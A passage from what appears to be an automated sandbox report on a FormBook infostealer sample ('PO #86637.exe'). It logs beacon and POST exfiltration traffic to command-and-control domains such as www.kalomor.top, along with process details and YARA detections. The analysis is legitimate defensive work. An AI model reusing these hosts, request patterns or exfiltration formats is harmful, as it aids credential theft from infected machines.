62 50 79 45 46 61 6b 48 78 2f 51 78 33 55 63 37 33 6e 65 4d 42 30 [TRUNCATED]
                    Data Ascii: 6X=QbFBNUhGo9/nX9/xHyfzY5ZpXg2k/qki3dl10GX8nZTDxY5WharcL9ZaUfy30JGpo0dHR6301omAoUalRU7WuFqlFmuUKGzLyfz7cIfG3zd/Z2HTrI/1o1c3vbqTM8ND34L/YDNCJcl1Nb8gc6pxlC2DKs0JRyIWsPd8RTOWzogIp1/G8fsoGJ8BUbFtkvWn0zE0+H9iaLnNKlra88WCFPfKJ2JogpB79YyqRRrdQkj+qF7NR7OooPZfK6q+49OpurFcPG2eyGaMEpou/6IUZtiLymaym+I5velTyiGX5GJF77R8syZrXfj4/bPyEFakHx/Qx3Uc73neMB0EZZZ246aViqmjz8o1peJZngac0Lwa99kP0xJtCO1+sgJXl7BfPol1ep686HJzajoBscCsT6Iy9Udolg7YRBG9VeVHlXcYTcmfLz1BTX3lFN5bc/lq03V0pdqlAWIzbnrkNPLHGB/8tUUOjoYW6lG0Him9bEPS2PqV2ZIWLiijbgQ3WbXJ9h3OCT9J7AQO1KCtNjgRKF3ljBa0nUFDgHnUa9uOJOa/X9kWvTtVFu9RUiBaD4Sj2aSXxfb3VRgCkn5Z/tKHMksQ3vStjzinZUFS8+dpr2lqoWuoSM79uIRWu57Xwnfn33CZfOIkVmrOMwzzu/3x5TiVPXWI6mXMgrU3XkncAoplOOzkHmzGyR2mA4hEQb8lXmYkGIGhQm5yzEk+M9LT/FRy/rz0GrfdoN0/HIYK1LxDl+LvL3tidbCxInerS0Y/XF4u1kpwoEcVYXdx3opaQ8h+ZG0rOu0imGUME7XF2ogsTogvDZU1PX0OmZnFsTVv0r2NoidULPtxvsArLb7zu4+8USY76Ad540+Y8NgEPL04v6cANyIs3N2DHWLYvY1aTPRV873zogaCdAuhtaKWJC5Z7BoXGK+lyJ3o+FtANIi6N62iKf81m/0liPVWz7Ehz/95zLAqM91EONa5zII3RRuxVySglAIzvDKMFevgKHgt4UdSL [TRUNCATED]
                    Sep 22, 2024 17:42:05.325282097 CEST479INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:42:05 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.449765162.241.226.190805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:42:07.213990927 CEST488OUTGET /21tc/?6X=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.easyanalytics.site
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:42:07.803864002 CEST479INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:42:07 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.44976691.215.85.23805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:42:13.451229095 CEST733OUTPOST /1i25/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.kalomor.top
                    Origin: http://www.kalomor.top
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.kalomor.top/1i25/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 73 74 41 76 66 30 46 54 56 6b 63 6f 74 68 5a 59 75 52 65 53 6d 69 61 6d 59 6e 49 58 47 43 71 69 78 72 6a 4a 4d 53 32 4d 74 68 47 42 76 31 30 38 31 51 43 43 57 65 4a 30 68 75 65 37 30 66 66 47 44 4a 58 6b 76 65 74 6a 66 31 73 65 4b 77 46 57 43 48 46 45 42 6e 72 57 6e 73 77 32 76 4b 73 68 37 76 4e 78 74 6f 56 43 5a 56 73 4c 6e 67 4b 34 30 66 67 68 6a 72 35 68 54 70 67 6c 67 39 50 4b 69 59 67 50 33 70 42 70 56 4f 77 2b 63 47 6b 75 33 46 48 57 6b 76 2f 72 6a 72 35 55 34 34 48 4f 63 31 65 67 67 7a 70 31 51 6f 43 79 33 6d 4b 6b 2b 50 2f 31 43 6c 34 35 54 30 6e 38 58 37 72 6f 45 51 3d 3d
                    Data Ascii: 6X=stAvf0FTVkcothZYuReSmiamYnIXGCqixrjJMS2MthGBv1081QCCWeJ0hue70ffGDJXkvetjf1seKwFWCHFEBnrWnsw2vKsh7vNxtoVCZVsLngK40fghjr5hTpglg9PKiYgP3pBpVOw+cGku3FHWkv/rjr5U44HOc1eggzp1QoCy3mKk+P/1Cl45T0n8X7roEQ==
                    Sep 22, 2024 17:42:14.194087029 CEST309INHTTP/1.1 405 Not Allowed
                    Server: nginx/1.26.2
                    Date: Sun, 22 Sep 2024 15:42:14 GMT
                    Content-Type: text/html
                    Content-Length: 157
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.44976791.215.85.23805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:42:15.999684095 CEST753OUTPOST /1i25/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.kalomor.top
                    Origin: http://www.kalomor.top
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.kalomor.top/1i25/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 73 74 41 76 66 30 46 54 56 6b 63 6f 73 42 70 59 69 53 32 53 68 43 61 68 53 48 49 58 66 79 71 6d 78 72 76 4a 4d 51 61 63 75 54 69 42 73 52 38 38 32 55 32 43 52 65 4a 30 34 65 65 2b 70 76 65 45 44 4a 72 73 76 65 42 6a 66 31 49 65 4b 31 35 57 43 51 78 48 44 33 72 44 79 63 77 34 72 4b 73 68 37 76 4e 78 74 6f 42 6b 5a 56 55 4c 6e 30 4f 34 30 36 4d 6d 39 37 35 67 53 70 67 6c 78 74 50 47 69 59 67 74 33 73 6b 45 56 4e 59 2b 63 48 55 75 30 55 48 5a 33 50 2f 74 73 4c 35 46 35 71 4b 47 57 47 58 62 6e 69 34 56 4e 72 62 66 79 67 62 2b 76 2b 65 69 51 6c 63 4b 4f 7a 75 49 61 34 57 68 66 53 63 73 48 6a 72 4b 55 54 36 73 75 52 69 7a 79 61 76 76 57 76 55 3d
                    Data Ascii: 6X=stAvf0FTVkcosBpYiS2ShCahSHIXfyqmxrvJMQacuTiBsR882U2CReJ04ee+pveEDJrsveBjf1IeK15WCQxHD3rDycw4rKsh7vNxtoBkZVULn0O406Mm975gSpglxtPGiYgt3skEVNY+cHUu0UHZ3P/tsL5F5qKGWGXbni4VNrbfygb+v+eiQlcKOzuIa4WhfScsHjrKUT6suRizyavvWvU=
                    Sep 22, 2024 17:42:16.718717098 CEST309INHTTP/1.1 405 Not Allowed
                    Server: nginx/1.26.2
                    Date: Sun, 22 Sep 2024 15:42:16 GMT
                    Content-Type: text/html
                    Content-Length: 157
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.44976891.215.85.23805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:42:18.544348001 CEST10835OUTPOST /1i25/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.kalomor.top
                    Origin: http://www.kalomor.top
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.kalomor.top/1i25/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 73 74 41 76 66 30 46 54 56 6b 63 6f 73 42 70 59 69 53 32 53 68 43 61 68 53 48 49 58 66 79 71 6d 78 72 76 4a 4d 51 61 63 75 54 71 42 76 6a 6b 38 30 7a 71 43 51 65 4a 30 6e 75 65 2f 70 76 66 63 44 4a 7a 6f 76 65 63 59 66 7a 4d 65 4b 58 42 57 54 53 5a 48 4b 33 72 44 74 4d 77 31 76 4b 73 30 37 76 63 34 74 6f 52 6b 5a 56 55 4c 6e 79 69 34 79 76 67 6d 36 4c 35 68 54 70 67 35 67 39 50 69 69 5a 4a 53 33 74 6c 35 56 39 34 2b 63 6e 45 75 37 47 76 5a 74 50 2f 76 34 72 34 59 35 71 47 4a 57 46 69 67 6e 69 4e 43 4e 74 6e 66 2b 58 79 66 38 2f 65 6f 4b 47 78 59 61 51 4f 55 64 2f 44 69 65 67 56 59 4b 53 33 51 43 52 7a 4f 67 79 44 49 6b 65 54 70 4b 36 42 64 57 79 6c 6d 79 6d 55 70 67 62 64 50 34 57 6c 53 71 46 4c 2f 65 59 71 56 6f 4b 72 6b 48 33 59 47 50 72 77 4c 4f 78 79 6a 69 72 55 66 54 4c 32 7a 71 72 76 54 2f 45 77 7a 32 69 46 45 55 65 43 76 4b 4a 59 43 6d 31 74 30 66 57 79 54 51 6f 67 43 41 35 72 4f 75 34 38 77 6c 73 79 46 4f 49 52 39 4e 2f 50 36 57 54 72 76 6f 79 34 67 59 50 43 58 6c 6c 52 30 74 6c 48 [TRUNCATED]
                    Data Ascii: 6X=stAvf0FTVkcosBpYiS2ShCahSHIXfyqmxrvJMQacuTqBvjk80zqCQeJ0nue/pvfcDJzovecYfzMeKXBWTSZHK3rDtMw1vKs07vc4toRkZVULnyi4yvgm6L5hTpg5g9PiiZJS3tl5V94+cnEu7GvZtP/v4r4Y5qGJWFigniNCNtnf+Xyf8/eoKGxYaQOUd/DiegVYKS3QCRzOgyDIkeTpK6BdWylmymUpgbdP4WlSqFL/eYqVoKrkH3YGPrwLOxyjirUfTL2zqrvT/Ewz2iFEUeCvKJYCm1t0fWyTQogCA5rOu48wlsyFOIR9N/P6WTrvoy4gYPCXllR0tlHv6b2IvfuFlz02okaYUT3hddy8kDU+D91SADZy3wY9sSe7BdNEZT11y4MArAbibflc61yLhtbHwnVwAnbWoLOS93lKzwoGW/CC/YNtx/WJsJkL/7COvzgWWNOEPBQ9VQBaGFR4D1DWUtnzEewOKXsvtgdkTb5+n762yCgjzCUXlXItbnzNp6BGtlQJR1EC7fe1PUpVxvNzv2F/kxCZGIDMY+sQcjdgcXGTjUtPF/4ZK4jo69u5pWlXIw47/y9nasYJj0HrP8/M+wO0FJBHkn+8UJlzmUqN2O/sJZKOSULf6OY898hpv1QCZaI9+R9x26qw1ks6DQV8Mv7M6BcTAgpV6OYLHLwscwk8ZzZodLMOkiPBuSi9Aa1kG5F1jZwQQ+81h+y+4F3OYZt/OlT1YI9UU09SfABQ8gvhHkK/LqvodOx4IxRoCaoiwqz6K75l+NH+GYIaSGbEoB/V/RIncaPqU1DmkbH13kzcYUv6zf+ktS54wZH5PBlZ7xtnxtct+xL5Kn9v+8INDrYdS0SG2uBBO8zzG8VWvWdJcRQ7FicPubVpel7YTKkWDAdp7jLqpiP1qEQ6Q43kfhIXHiqKeubrvpWOR50dhrCIWybmunayRcDW0MMrwwPjZLKHXDz1rtHFaXSEDE1dpyYwd6T3BmaT1Ct9UMbs71udN [TRUNCATED]
                    Sep 22, 2024 17:42:19.238317013 CEST309INHTTP/1.1 405 Not Allowed
                    Server: nginx/1.26.2
                    Date: Sun, 22 Sep 2024 15:42:19 GMT
                    Content-Type: text/html
                    Content-Length: 157
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.44976991.215.85.23805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:42:21.086118937 CEST481OUTGET /1i25/?6X=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.kalomor.top
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:42:21.791749001 CEST236INHTTP/1.1 200 OK
                    Server: nginx/1.26.2
                    Date: Sun, 22 Sep 2024 15:42:21 GMT
                    Content-Type: text/html
                    Content-Length: 11694
                    Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                    Connection: close
                    ETag: "66e176fd-2dae"
                    Accept-Ranges: bytes
                    Sep 22, 2024 17:42:21.791809082 CEST1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co
                    Sep 22, 2024 17:42:21.791845083 CEST1236INData Raw: 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69
                    Data Ascii: ng:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:center;justify-content:c
                    Sep 22, 2024 17:42:21.791878939 CEST448INData Raw: 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 30 36 32 35 72 65 6d 3b 66 6f 6e
                    Data Ascii: fy-content:center;align-items:center;text-align:center;border-radius:1.0625rem;font-weight:500;padding:.375rem .8125rem}@media (min-width:45.625em){.window-main__actions,.window-main__body{margin-top:1.875rem}.window-main{padding:3.75rem 8.937
                    Sep 22, 2024 17:42:21.791910887 CEST1236INData Raw: 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65
                    Data Ascii: }@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__ite
                    Sep 22, 2024 17:42:21.792001009 CEST1236INData Raw: 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e
                    Data Ascii: n{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20rem)/ 25.625)}}@supports (paddin
                    Sep 22, 2024 17:42:21.792033911 CEST448INData Raw: 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 6e 66 6f 7b 6d 61
                    Data Ascii: m:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.w
                    Sep 22, 2024 17:42:21.792066097 CEST1236INData Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                    Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
                    Sep 22, 2024 17:42:21.792098999 CEST1236INData Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                    Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 2
                    Sep 22, 2024 17:42:21.792131901 CEST448INData Raw: 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 31 32 34 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09
                    Data Ascii: stdDeviation="124" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
                    Sep 22, 2024 17:42:21.799048901 CEST1236INData Raw: 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09 09 09 09 09 3c 66 69 6c 74 65 72 20 69 64 3d 22 66 69 6c 74 65 72 32 5f 66 5f 32 30 30
                    Data Ascii: ffect1_foregroundBlur_2001_5" /></filter><filter id="filter2_f_2001_5" x="59.2946" y="36.0856" width="514.378" height="571.162" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0"


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:11:39:16
                    Start date:22/09/2024
                    Path:C:\Users\user\Desktop\PO #86637.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\PO #86637.exe"
                    Imagebase:0x400000
                    File size:1'373'705 bytes
                    MD5 hash:7FE19C52241499F1A94815CA779701D2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:1
                    Start time:11:39:17
                    Start date:22/09/2024
                    Path:C:\Windows\SysWOW64\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\PO #86637.exe"
                    Imagebase:0xa90000
                    File size:46'504 bytes
                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
